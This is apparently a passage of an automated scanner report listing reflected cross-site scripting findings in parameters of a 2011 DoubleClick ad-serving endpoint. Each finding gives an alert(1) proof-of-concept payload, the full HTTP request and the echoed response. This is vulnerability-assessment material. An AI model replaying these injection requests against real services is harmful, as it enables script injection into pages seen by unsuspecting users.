User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 27 Apr 2011 23:37:16 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4689

document.write('\n\n');

function DCFlash(id,pVM){
...[SNIP]...
leclick.net/click%3Bh%3Dv8/3af6/17/14a/%2a/k%3B239757684%3B1-0%3B0%3B61212126%3B3454-728/90%3B41608435/41626222/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A74064"-alert(1)-"20216c724cc&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt
...[SNIP]...

3.371. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [oepartner parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5823.CNET/B4978620.21

Issue detail

The value of the oepartner request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 97e97'-alert(1)-'22e385047a5 was submitted in the oepartner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5823.CNET/B4978620.21;sz=728x90;click0=http://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=97e97'-alert(1)-'22e385047a5&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/;ord=2011.04.27.23.35.39? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bnet.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 27 Apr 2011 23:39:26 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4689

document.write('\n\n');

function DCFlash(id,pVM){
...[SNIP]...
2/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=97e97'-alert(1)-'22e385047a5&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/http://www.hp.com/united-states/campaigns/officejet-pro/?jumpid=ex_r11400_us/e
...[SNIP]...

3.372. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [oepartner parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5823.CNET/B4978620.21

Issue detail

The value of the oepartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6d8ca"-alert(1)-"74b7959faa0 was submitted in the oepartner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5823.CNET/B4978620.21;sz=728x90;click0=http://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=6d8ca"-alert(1)-"74b7959faa0&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/;ord=2011.04.27.23.35.39? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bnet.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 27 Apr 2011 23:39:21 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4695

document.write('\n\n');

function DCFlash(id,pVM){
...[SNIP]...
1/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=6d8ca"-alert(1)-"74b7959faa0&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/http://www.hp.com/united-states/campaigns/officejet-pro/?jumpid=ex_r11400_us/e
...[SNIP]...

3.373. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [orh parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5823.CNET/B4978620.21

Issue detail

The value of the orh request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 473d7"-alert(1)-"9edf1d55749 was submitted in the orh parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5823.CNET/B4978620.21;sz=728x90;click0=http://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=473d7"-alert(1)-"9edf1d55749&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/;ord=2011.04.27.23.35.39? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bnet.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 27 Apr 2011 23:39:13 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4695

document.write('\n\n');

function DCFlash(id,pVM){
...[SNIP]...
334/41626121/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=473d7"-alert(1)-"9edf1d55749&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/http://www.hp.com/united-states/campaigns/officejet-pro/?jumpid=ex_
...[SNIP]...

3.374. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [orh parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5823.CNET/B4978620.21

Issue detail

The value of the orh request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1f1dd'-alert(1)-'82727c93856 was submitted in the orh parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5823.CNET/B4978620.21;sz=728x90;click0=http://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=1f1dd'-alert(1)-'82727c93856&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/;ord=2011.04.27.23.35.39? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bnet.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 27 Apr 2011 23:39:17 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4695

document.write('\n\n');

function DCFlash(id,pVM){
...[SNIP]...
334/41626121/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=1f1dd'-alert(1)-'82727c93856&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/http://www.hp.com/united-states/campaigns/officejet-pro/?jumpid=ex_
...[SNIP]...

3.375. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [p parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5823.CNET/B4978620.21

Issue detail

The value of the p request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e29f4"-alert(1)-"a641ff2d0cd was submitted in the p parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5823.CNET/B4978620.21;sz=728x90;click0=http://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=e29f4"-alert(1)-"a641ff2d0cd&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/;ord=2011.04.27.23.35.39? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bnet.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 27 Apr 2011 23:37:36 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4695

document.write('\n\n');

function DCFlash(id,pVM){
...[SNIP]...
net/click%3Bh%3Dv8/3af6/17/14a/%2a/n%3B239757684%3B0-0%3B0%3B61212126%3B3454-728/90%3B41608334/41626121/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=e29f4"-alert(1)-"a641ff2d0cd&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.
...[SNIP]...

3.376. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [p parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5823.CNET/B4978620.21

Issue detail

The value of the p request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d1f6e'-alert(1)-'7a9c8a63dbf was submitted in the p parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5823.CNET/B4978620.21;sz=728x90;click0=http://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=d1f6e'-alert(1)-'7a9c8a63dbf&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/;ord=2011.04.27.23.35.39? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bnet.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 27 Apr 2011 23:37:40 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4695

document.write('\n\n');

function DCFlash(id,pVM){
...[SNIP]...
net/click%3Bh%3Dv8/3af6/17/14a/%2a/n%3B239757684%3B0-0%3B0%3B61212126%3B3454-728/90%3B41608334/41626121/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=d1f6e'-alert(1)-'7a9c8a63dbf&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.
...[SNIP]...

3.377. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [pdom parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5823.CNET/B4978620.21

Issue detail

The value of the pdom request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fbdf0'-alert(1)-'26ef0e3c3aa was submitted in the pdom parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5823.CNET/B4978620.21;sz=728x90;click0=http://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=fbdf0'-alert(1)-'26ef0e3c3aa&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/;ord=2011.04.27.23.35.39? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bnet.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 27 Apr 2011 23:39:51 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4695

document.write('\n\n');

function DCFlash(id,pVM){
...[SNIP]...
://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=fbdf0'-alert(1)-'26ef0e3c3aa&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/http://www.hp.com/united-states/campaigns/officejet-pro/?jumpid=ex_r11400_us/en/smb/ipg/ojp_olas/dm:_N58
...[SNIP]...

3.378. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [pdom parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5823.CNET/B4978620.21

Issue detail

The value of the pdom request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 576c0"-alert(1)-"3511e11aea was submitted in the pdom parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5823.CNET/B4978620.21;sz=728x90;click0=http://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=576c0"-alert(1)-"3511e11aea&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/;ord=2011.04.27.23.35.39? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bnet.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 27 Apr 2011 23:39:47 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4687

document.write('\n\n');

function DCFlash(id,pVM){
...[SNIP]...
://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=576c0"-alert(1)-"3511e11aea&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/http://www.hp.com/united-states/campaigns/officejet-pro/?jumpid=ex_r11400_us/en/smb/ipg/ojp_olas/dm:_N58
...[SNIP]...

3.379. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [pg parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5823.CNET/B4978620.21

Issue detail

The value of the pg request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2b2fa"-alert(1)-"b9c64a612f4 was submitted in the pg parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5823.CNET/B4978620.21;sz=728x90;click0=http://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt2b2fa"-alert(1)-"b9c64a612f4&t=2011.04.27.23.35.39&event=58/;ord=2011.04.27.23.35.39? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bnet.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 27 Apr 2011 23:40:22 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4695

document.write('\n\n');

function DCFlash(id,pVM){
...[SNIP]...
&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt2b2fa"-alert(1)-"b9c64a612f4&t=2011.04.27.23.35.39&event=58/http://www.hp.com/united-states/campaigns/officejet-pro/?jumpid=ex_r11400_us/en/smb/ipg/ojp_olas/dm:_N5823.CNET_61212126_239757684_41608334");
var wmode = "opaque";
var
...[SNIP]...

3.380. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [pg parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5823.CNET/B4978620.21

Issue detail

The value of the pg request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e0253'-alert(1)-'fc73d229855 was submitted in the pg parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5823.CNET/B4978620.21;sz=728x90;click0=http://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAte0253'-alert(1)-'fc73d229855&t=2011.04.27.23.35.39&event=58/;ord=2011.04.27.23.35.39? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bnet.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 27 Apr 2011 23:40:26 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4695

document.write('\n\n');

function DCFlash(id,pVM){
...[SNIP]...
&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAte0253'-alert(1)-'fc73d229855&t=2011.04.27.23.35.39&event=58/http://www.hp.com/united-states/campaigns/officejet-pro/?jumpid=ex_r11400_us/en/smb/ipg/ojp_olas/dm:_N5823.CNET_61212126_239757684_41608334\">
...[SNIP]...

3.381. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [pid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5823.CNET/B4978620.21

Issue detail

The value of the pid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b4502"-alert(1)-"bcfcfdf8581 was submitted in the pid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5823.CNET/B4978620.21;sz=728x90;click0=http://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=b4502"-alert(1)-"bcfcfdf8581&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/;ord=2011.04.27.23.35.39? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bnet.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 27 Apr 2011 23:38:29 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4689

document.write('\n\n');

function DCFlash(id,pVM){
...[SNIP]...
